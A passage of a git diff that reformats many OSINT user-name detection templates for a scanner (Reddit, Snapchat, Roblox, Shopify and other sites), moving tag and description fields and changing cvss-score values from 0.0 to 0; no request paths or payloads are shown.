tags: osint,osint-blog,rantli metadata: max-request: 1 + tags: osint,osint-blog,rantli self-contained: true + http: - method: GET path: diff --git a/http/osint/reblogme.yaml b/http/osint/reblogme.yaml index 1b15ed72b6..7e8cfd8bf3 100644 --- a/http/osint/reblogme.yaml +++ b/http/osint/reblogme.yaml @@ -3,17 +3,18 @@ id: reblogme info: name: ReblogMe User Name Information - Detect author: dwisiswant0 - description: ReblogMe user name information check was conducted. severity: info + description: ReblogMe user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,reblogme metadata: max-request: 1 + tags: osint,osint-porn,reblogme self-contained: true + http: - method: GET path: diff --git a/http/osint/redbubble.yaml b/http/osint/redbubble.yaml index f2928a11c8..a721eb9bda 100644 --- a/http/osint/redbubble.yaml +++ b/http/osint/redbubble.yaml @@ -7,13 +7,14 @@ info: description: Redbubble user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,redbubble metadata: max-request: 1 + tags: osint,osint-shopping,redbubble self-contained: true + http: - method: GET path: diff --git a/http/osint/reddit.yaml b/http/osint/reddit.yaml index b325ebb56b..eac1f5e78e 100644 --- a/http/osint/reddit.yaml +++ b/http/osint/reddit.yaml @@ -3,17 +3,18 @@ id: reddit info: name: Reddit User Name Information - Detect author: dwisiswant0 - description: Reddit user name information check was conducted. severity: info + description: Reddit user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,reddit metadata: max-request: 1 + tags: osint,osint-social,reddit self-contained: true + http: - method: GET path: diff --git a/http/osint/redgifs.yaml b/http/osint/redgifs.yaml index e0b98bba99..cffc50f2c1 100644 --- a/http/osint/redgifs.yaml +++ b/http/osint/redgifs.yaml @@ -3,17 +3,18 @@ id: redgifs info: name: REDGIFS User Name Information - Detect author: dwisiswant0 - description: REDGIFS user name information check was conducted. severity: info + description: REDGIFS user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,redgifs metadata: max-request: 1 + tags: osint,osint-porn,redgifs self-contained: true + http: - method: GET path: diff --git a/http/osint/refsheet.yaml b/http/osint/refsheet.yaml index 24d426660b..2e7dfb36c4 100644 --- a/http/osint/refsheet.yaml +++ b/http/osint/refsheet.yaml @@ -3,17 +3,18 @@ id: refsheet info: name: Refsheet User Name Information - Detect author: dwisiswant0 - description: Refsheet user name information check was conducted. severity: info + description: Refsheet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,refsheet metadata: max-request: 1 + tags: osint,osint-hobby,refsheet self-contained: true + http: - method: GET path: diff --git a/http/osint/researchgate.yaml b/http/osint/researchgate.yaml index aa7ed96614..a16429aa7c 100644 --- a/http/osint/researchgate.yaml +++ b/http/osint/researchgate.yaml @@ -3,17 +3,18 @@ id: researchgate info: name: Researchgate User Name Information - Detect author: dwisiswant0 - description: Researchgate user name information check was conducted. severity: info + description: Researchgate user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,researchgate metadata: max-request: 1 + tags: osint,osint-hobby,researchgate self-contained: true + http: - method: GET path: diff --git a/http/osint/resumes-actorsaccess.yaml b/http/osint/resumes-actorsaccess.yaml index c021a6c978..662239d9bc 100644 --- a/http/osint/resumes-actorsaccess.yaml +++ b/http/osint/resumes-actorsaccess.yaml @@ -3,17 +3,18 @@ id: resumes-actorsaccess info: name: Resumes actorsaccess User Name Information - Detect author: dwisiswant0 - description: Resumes actorsaccess user name information check was conducted. severity: info + description: Resumes actorsaccess user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,resumes-actorsaccess metadata: max-request: 1 + tags: osint,osint-social,resumes-actorsaccess self-contained: true + http: - method: GET path: diff --git a/http/osint/revolut.yaml b/http/osint/revolut.yaml index 8b103d6532..3bde76eb8e 100644 --- a/http/osint/revolut.yaml +++ b/http/osint/revolut.yaml @@ -3,17 +3,18 @@ id: revolut info: name: Revolut User Name Information - Detect author: dwisiswant0 - description: Revolut user name information check was conducted. severity: info + description: Revolut user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,revolut metadata: max-request: 1 + tags: osint,osint-finance,revolut self-contained: true + http: - method: GET path: diff --git a/http/osint/riskru.yaml b/http/osint/riskru.yaml index 5ff9c5d225..290b62f80d 100644 --- a/http/osint/riskru.yaml +++ b/http/osint/riskru.yaml @@ -3,17 +3,18 @@ id: riskru info: name: Risk.ru User Name Information - Detect author: dwisiswant0 - description: Risk.ru user name information check was conducted. severity: info + description: Risk.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,riskru metadata: max-request: 1 + tags: osint,osint-hobby,riskru self-contained: true + http: - method: GET path: diff --git a/http/osint/roblox.yaml b/http/osint/roblox.yaml index 3aaead382a..c0869dd738 100644 --- a/http/osint/roblox.yaml +++ b/http/osint/roblox.yaml @@ -3,17 +3,18 @@ id: roblox info: name: Roblox User Name Information - Detect author: dwisiswant0 - description: Roblox user name information check was conducted. severity: info + description: Roblox user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,roblox metadata: max-request: 1 + tags: osint,osint-gaming,roblox self-contained: true + http: - method: GET path: diff --git a/http/osint/rsi.yaml b/http/osint/rsi.yaml index 5243813fa3..c169f088be 100644 --- a/http/osint/rsi.yaml +++ b/http/osint/rsi.yaml @@ -3,17 +3,18 @@ id: rsi info: name: Rsi User Name Information - Detect author: dwisiswant0 - description: Rsi user name information check was conducted. severity: info + description: Rsi user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,rsi metadata: max-request: 1 + tags: osint,osint-gaming,rsi self-contained: true + http: - method: GET path: diff --git a/http/osint/ru-123rf.yaml b/http/osint/ru-123rf.yaml index 122bec4fbc..52205c958c 100644 --- a/http/osint/ru-123rf.yaml +++ b/http/osint/ru-123rf.yaml @@ -3,17 +3,18 @@ id: ru-123rf info: name: Ru 123rf User Name Information - Detect author: dwisiswant0 - description: Ru 123rf user name information check was conducted. severity: info + description: Ru 123rf user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,ru-123rf metadata: max-request: 1 + tags: osint,osint-hobby,ru-123rf self-contained: true + http: - method: GET path: diff --git a/http/osint/rubygems.yaml b/http/osint/rubygems.yaml index 2a41656873..79bfb898e8 100644 --- a/http/osint/rubygems.yaml +++ b/http/osint/rubygems.yaml @@ -3,17 +3,18 @@ id: rubygems info: name: RubyGems User Name Information - Detect author: cheesymoon - description: RubyGems.org user name information check was conducted. severity: info + description: RubyGems.org user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,rubygems metadata: max-request: 1 + tags: osint,osint-social,rubygems self-contained: true + http: - method: GET path: diff --git a/http/osint/rumblechannel.yaml b/http/osint/rumblechannel.yaml index cce7bc50f8..a182bf9058 100644 --- a/http/osint/rumblechannel.yaml +++ b/http/osint/rumblechannel.yaml @@ -3,17 +3,18 @@ id: rumblechannel info: name: RumbleChannel User Name Information - Detect author: dwisiswant0 - description: RumbleChannel user name information check was conducted. severity: info + description: RumbleChannel user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,rumblechannel metadata: max-request: 1 + tags: osint,osint-political,rumblechannel self-contained: true + http: - method: GET path: diff --git a/http/osint/rumbleuser.yaml b/http/osint/rumbleuser.yaml index 08c74f700b..5bf2e09810 100644 --- a/http/osint/rumbleuser.yaml +++ b/http/osint/rumbleuser.yaml @@ -3,17 +3,18 @@ id: rumbleuser info: name: RumbleUser User Name Information - Detect author: dwisiswant0 - description: RumbleUser user name information check was conducted. severity: info + description: RumbleUser user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,rumbleuser metadata: max-request: 1 + tags: osint,osint-political,rumbleuser self-contained: true + http: - method: GET path: diff --git a/http/osint/salon24.yaml b/http/osint/salon24.yaml index bb6c2f8edf..e31793a2ec 100644 --- a/http/osint/salon24.yaml +++ b/http/osint/salon24.yaml @@ -3,17 +3,18 @@ id: salon24 info: name: Salon24 User Name Information - Detect author: dwisiswant0 - description: Salon24 user name information check was conducted. severity: info + description: Salon24 user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,salon24 metadata: max-request: 1 + tags: osint,osint-blog,salon24 self-contained: true + http: - method: GET path: diff --git a/http/osint/saracartershow.yaml b/http/osint/saracartershow.yaml index 0717083341..1c28cc82ab 100644 --- a/http/osint/saracartershow.yaml +++ b/http/osint/saracartershow.yaml @@ -3,17 +3,18 @@ id: saracartershow info: name: SaraCarterShow User Name Information - Detect author: dwisiswant0 - description: SaraCarterShow user name information check was conducted. severity: info + description: SaraCarterShow user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,saracartershow metadata: max-request: 1 + tags: osint,osint-political,saracartershow self-contained: true + http: - method: GET path: diff --git a/http/osint/scoutwiki.yaml b/http/osint/scoutwiki.yaml index f1b9bb36bf..31f589de46 100644 --- a/http/osint/scoutwiki.yaml +++ b/http/osint/scoutwiki.yaml @@ -3,17 +3,18 @@ id: scoutwiki info: name: ScoutWiki User Name Information - Detect author: dwisiswant0 - description: ScoutWiki user name information check was conducted. severity: info + description: ScoutWiki user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,scoutwiki metadata: max-request: 1 + tags: osint,osint-social,scoutwiki self-contained: true + http: - method: GET path: diff --git a/http/osint/scratch.yaml b/http/osint/scratch.yaml index f973853260..9e694cb835 100644 --- a/http/osint/scratch.yaml +++ b/http/osint/scratch.yaml @@ -3,17 +3,18 @@ id: scratch info: name: Scratch User Name Information - Detect author: dwisiswant0 - description: Scratch user name information check was conducted. severity: info + description: Scratch user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,scratch metadata: max-request: 1 + tags: osint,osint-coding,scratch self-contained: true + http: - method: GET path: diff --git a/http/osint/secure-donation.yaml b/http/osint/secure-donation.yaml index f081061e78..3a73540e0d 100644 --- a/http/osint/secure-donation.yaml +++ b/http/osint/secure-donation.yaml @@ -3,17 +3,18 @@ id: secure-donation info: name: Secure donation User Name Information - Detect author: dwisiswant0 - description: Secure donation user name information check was conducted. severity: info + description: Secure donation user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,secure-donation metadata: max-request: 1 + tags: osint,osint-finance,secure-donation self-contained: true + http: - method: GET path: diff --git a/http/osint/seneporno.yaml b/http/osint/seneporno.yaml index 75eeb00a5c..b6a4384e74 100644 --- a/http/osint/seneporno.yaml +++ b/http/osint/seneporno.yaml @@ -3,17 +3,18 @@ id: seneporno info: name: Seneporno User Name Information - Detect author: dwisiswant0 - description: Seneporno user name information check was conducted. severity: info + description: Seneporno user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,seneporno metadata: max-request: 1 + tags: osint,osint-porn,seneporno self-contained: true + http: - method: GET path: diff --git a/http/osint/sentimente.yaml b/http/osint/sentimente.yaml index aef716aaee..7ff64ab2c6 100644 --- a/http/osint/sentimente.yaml +++ b/http/osint/sentimente.yaml @@ -3,17 +3,18 @@ id: sentimente info: name: Sentimente User Name Information - Detect author: dwisiswant0 - description: Sentimente user name information check was conducted. severity: info + description: Sentimente user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,sentimente metadata: max-request: 1 + tags: osint,osint-dating,sentimente self-contained: true + http: - method: GET path: diff --git a/http/osint/seoclerks.yaml b/http/osint/seoclerks.yaml index c96b928aa5..c38987a0d2 100644 --- a/http/osint/seoclerks.yaml +++ b/http/osint/seoclerks.yaml @@ -3,17 +3,18 @@ id: seoclerks info: name: SEOClerks User Name Information - Detect author: dwisiswant0 - description: SEOClerks user name information check was conducted. severity: info + description: SEOClerks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,seoclerks metadata: max-request: 1 + tags: osint,osint-social,seoclerks self-contained: true + http: - method: GET path: diff --git a/http/osint/setlistfm.yaml b/http/osint/setlistfm.yaml index 8fda85210f..b9862f5a48 100644 --- a/http/osint/setlistfm.yaml +++ b/http/osint/setlistfm.yaml @@ -3,17 +3,18 @@ id: setlistfm info: name: Setlist.fm User Name Information - Detect author: dwisiswant0 - description: Setlist.fm user name information check was conducted. severity: info + description: Setlist.fm user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,setlistfm metadata: max-request: 1 + tags: osint,osint-music,setlistfm self-contained: true + http: - method: GET path: diff --git a/http/osint/sexworker.yaml b/http/osint/sexworker.yaml index 1ecf8ad476..9841b5723a 100644 --- a/http/osint/sexworker.yaml +++ b/http/osint/sexworker.yaml @@ -3,17 +3,18 @@ id: sexworker info: name: Sexworker User Name Information - Detect author: dwisiswant0 - description: Sexworker user name information check was conducted. severity: info + description: Sexworker user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,sexworker metadata: max-request: 1 + tags: osint,osint-porn,sexworker self-contained: true + http: - method: GET path: diff --git a/http/osint/sfd.yaml b/http/osint/sfd.yaml index 9c38f0c303..aafc6f6c97 100644 --- a/http/osint/sfd.yaml +++ b/http/osint/sfd.yaml @@ -3,17 +3,18 @@ id: sfd info: name: SFD User Name Information - Detect author: dwisiswant0 - description: SFD user name information check was conducted. severity: info + description: SFD user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,sfd metadata: max-request: 1 + tags: osint,osint-health,sfd self-contained: true + http: - method: GET path: diff --git a/http/osint/shanii-writes.yaml b/http/osint/shanii-writes.yaml index 50294ca8a4..6ce84bc862 100644 --- a/http/osint/shanii-writes.yaml +++ b/http/osint/shanii-writes.yaml @@ -3,17 +3,18 @@ id: shanii-writes info: name: Shanii Writes User Name Information - Detect author: dwisiswant0 - description: Shanii Writes user name information check was conducted. severity: info + description: Shanii Writes user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,shanii-writes metadata: max-request: 1 + tags: osint,osint-social,shanii-writes self-contained: true + http: - method: GET path: diff --git a/http/osint/shesfreaky.yaml b/http/osint/shesfreaky.yaml index f674023a2b..e71439c88d 100644 --- a/http/osint/shesfreaky.yaml +++ b/http/osint/shesfreaky.yaml @@ -3,17 +3,18 @@ id: shesfreaky info: name: Shesfreaky User Name Information - Detect author: dwisiswant0 - description: Shesfreaky user name information check was conducted. severity: info + description: Shesfreaky user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,shesfreaky metadata: max-request: 1 + tags: osint,osint-porn,shesfreaky self-contained: true + http: - method: GET path: diff --git a/http/osint/shopify.yaml b/http/osint/shopify.yaml index d3fbca5b48..4c4371b345 100644 --- a/http/osint/shopify.yaml +++ b/http/osint/shopify.yaml @@ -3,17 +3,18 @@ id: shopify info: name: Shopify User Name Information - Detect author: dwisiswant0 - description: Shopify user name information check was conducted. severity: info + description: Shopify user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,shopify metadata: max-request: 1 + tags: osint,osint-shopping,shopify self-contained: true + http: - method: GET path: diff --git a/http/osint/shutterstock.yaml b/http/osint/shutterstock.yaml index 25b9bf4f67..c960362c2c 100644 --- a/http/osint/shutterstock.yaml +++ b/http/osint/shutterstock.yaml @@ -3,17 +3,18 @@ id: shutterstock info: name: Shutterstock User Name Information - Detect author: dwisiswant0 - description: Shutterstock user name information check was conducted. severity: info + description: Shutterstock user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,shutterstock metadata: max-request: 1 + tags: osint,osint-images,shutterstock self-contained: true + http: - method: GET path: diff --git a/http/osint/skeb.yaml b/http/osint/skeb.yaml index 2971084a62..70448a1657 100644 --- a/http/osint/skeb.yaml +++ b/http/osint/skeb.yaml @@ -3,17 +3,18 @@ id: skeb info: name: Skeb User Name Information - Detect author: dwisiswant0 - description: Skeb user name information check was conducted. severity: info + description: Skeb user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,skeb metadata: max-request: 1 + tags: osint,osint-art,skeb self-contained: true + http: - method: GET path: diff --git a/http/osint/skillshare.yaml b/http/osint/skillshare.yaml index 4b43b11c06..92f9417291 100644 --- a/http/osint/skillshare.yaml +++ b/http/osint/skillshare.yaml @@ -7,13 +7,14 @@ info: description: Skill Share user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,skillshare metadata: max-request: 1 + tags: osint,osint-social,skillshare self-contained: true + http: - method: GET path: diff --git a/http/osint/skyrock.yaml b/http/osint/skyrock.yaml index 4f3f9e807d..898aadcd18 100644 --- a/http/osint/skyrock.yaml +++ b/http/osint/skyrock.yaml @@ -3,17 +3,18 @@ id: skyrock info: name: Skyrock User Name Information - Detect author: dwisiswant0 - description: Skyrock user name information check was conducted. severity: info + description: Skyrock user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,skyrock metadata: max-request: 1 + tags: osint,osint-social,skyrock self-contained: true + http: - method: GET path: diff --git a/http/osint/slackholes.yaml b/http/osint/slackholes.yaml index 144bc4048a..f4fba0b2b3 100644 --- a/http/osint/slackholes.yaml +++ b/http/osint/slackholes.yaml @@ -3,17 +3,18 @@ id: slackholes info: name: SlackHoles User Name Information - Detect author: dwisiswant0 - description: SlackHoles user name information check was conducted. severity: info + description: SlackHoles user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,slackholes metadata: max-request: 1 + tags: osint,osint-porn,slackholes self-contained: true + http: - method: GET path: diff --git a/http/osint/slant.yaml b/http/osint/slant.yaml index 0205d3098e..401cb065cb 100644 --- a/http/osint/slant.yaml +++ b/http/osint/slant.yaml @@ -3,17 +3,18 @@ id: slant info: name: Slant User Name Information - Detect author: dwisiswant0 - description: Slant user name information check was conducted. severity: info + description: Slant user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,slant metadata: max-request: 1 + tags: osint,osint-shopping,slant self-contained: true + http: - method: GET path: diff --git a/http/osint/slides.yaml b/http/osint/slides.yaml index 1560ecbbbc..600ff0d86f 100644 --- a/http/osint/slides.yaml +++ b/http/osint/slides.yaml @@ -3,17 +3,18 @@ id: slides info: name: Slides User Name Information - Detect author: dwisiswant0 - description: Slides user name information check was conducted. severity: info + description: Slides user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,slides metadata: max-request: 1 + tags: osint,osint-social,slides self-contained: true + http: - method: GET path: diff --git a/http/osint/slideshare.yaml b/http/osint/slideshare.yaml index 6c7541983e..0ff178aa67 100644 --- a/http/osint/slideshare.yaml +++ b/http/osint/slideshare.yaml @@ -3,17 +3,18 @@ id: slideshare info: name: Slideshare User Name Information - Detect author: dwisiswant0 - description: Slideshare user name information check was conducted. severity: info + description: Slideshare user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,slideshare metadata: max-request: 1 + tags: osint,osint-social,slideshare self-contained: true + http: - method: GET path: diff --git a/http/osint/smashrun.yaml b/http/osint/smashrun.yaml index b14aed51cf..721578c51a 100644 --- a/http/osint/smashrun.yaml +++ b/http/osint/smashrun.yaml @@ -3,17 +3,18 @@ id: smashrun info: name: SmashRun User Name Information - Detect author: dwisiswant0 - description: SmashRun user name information check was conducted. severity: info + description: SmashRun user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,smashrun metadata: max-request: 1 + tags: osint,osint-health,smashrun self-contained: true + http: - method: GET path: diff --git a/http/osint/smelsy.yaml b/http/osint/smelsy.yaml index b5954600d3..637a8b8a39 100644 --- a/http/osint/smelsy.yaml +++ b/http/osint/smelsy.yaml @@ -3,17 +3,18 @@ id: smelsy info: name: Smelsy User Name Information - Detect author: dwisiswant0 - description: Smelsy user name information check was conducted. severity: info + description: Smelsy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,smelsy metadata: max-request: 1 + tags: osint,osint-misc,smelsy self-contained: true + http: - method: GET path: diff --git a/http/osint/smugmug.yaml b/http/osint/smugmug.yaml index 93a5bb3415..e17c9711f4 100644 --- a/http/osint/smugmug.yaml +++ b/http/osint/smugmug.yaml @@ -3,17 +3,18 @@ id: smugmug info: name: SmugMug User Name Information - Detect author: dwisiswant0 - description: SmugMug user name information check was conducted. severity: info + description: SmugMug user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,smugmug metadata: max-request: 1 + tags: osint,osint-images,smugmug self-contained: true + http: - method: GET path: diff --git a/http/osint/smule.yaml b/http/osint/smule.yaml index 76e3db5357..e90b3e43b0 100644 --- a/http/osint/smule.yaml +++ b/http/osint/smule.yaml @@ -3,17 +3,18 @@ id: smule info: name: Smule User Name Information - Detect author: dwisiswant0 - description: Smule user name information check was conducted. severity: info + description: Smule user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,smule metadata: max-request: 1 + tags: osint,osint-music,smule self-contained: true + http: - method: GET path: diff --git a/http/osint/snapchat-stories.yaml b/http/osint/snapchat-stories.yaml index 37829b1355..5e616c8dc7 100644 --- a/http/osint/snapchat-stories.yaml +++ b/http/osint/snapchat-stories.yaml @@ -3,17 +3,18 @@ id: snapchat-stories info: name: Snapchat Stories User Name Information - Detect author: dwisiswant0 - description: Snapchat Stories user name information check was conducted. severity: info + description: Snapchat Stories user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,snapchat-stories metadata: max-request: 1 + tags: osint,osint-social,snapchat-stories self-contained: true + http: - method: GET path: diff --git a/http/osint/snapchat.yaml b/http/osint/snapchat.yaml index 0fb4405a50..608f6acc0e 100644 --- a/http/osint/snapchat.yaml +++ b/http/osint/snapchat.yaml @@ -3,17 +3,18 @@ id: snapchat info: name: Snapchat User Name Information - Detect author: dwisiswant0 - description: Snapchat user name information check was conducted. severity: info + description: Snapchat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,snapchat metadata: max-request: 1 + tags: osint,osint-social,snapchat self-contained: true + http: - method: GET path: diff --git a/http/osint/snipfeed.yaml b/http/osint/snipfeed.yaml index ce5df61ab0..29aeefa34b 100644 --- a/http/osint/snipfeed.yaml +++ b/http/osint/snipfeed.yaml @@ -3,17 +3,18 @@ id: snipfeed info: name: Snipfeed User Name Information - Detect author: dwisiswant0 - description: Snipfeed user name information check was conducted. severity: info + description: Snipfeed user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,snipfeed metadata: max-request: 1 + tags: osint,osint-misc,snipfeed self-contained: true + http: - method: GET path: diff --git a/http/osint/soccitizen4eu.yaml b/http/osint/soccitizen4eu.yaml index 9cfec9f0a1..a79bae9b20 100644 --- a/http/osint/soccitizen4eu.yaml +++ b/http/osint/soccitizen4eu.yaml @@ -3,17 +3,18 @@ id: soccitizen4eu info: name: Soc.citizen4.eu User Name Information - Detect author: dwisiswant0 - description: Soc.citizen4.eu user name information check was conducted. severity: info + description: Soc.citizen4.eu user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,soccitizen4eu metadata: max-request: 1 + tags: osint,osint-social,soccitizen4eu self-contained: true + http: - method: GET path: diff --git a/http/osint/social-msdn.yaml b/http/osint/social-msdn.yaml index 63909c8c22..e6d320a3c0 100644 --- a/http/osint/social-msdn.yaml +++ b/http/osint/social-msdn.yaml @@ -3,17 +3,18 @@ id: social-msdn info: name: Social msdn User Name Information - Detect author: dwisiswant0 - description: Social msdn user name information check was conducted. severity: info + description: Social msdn user name information check 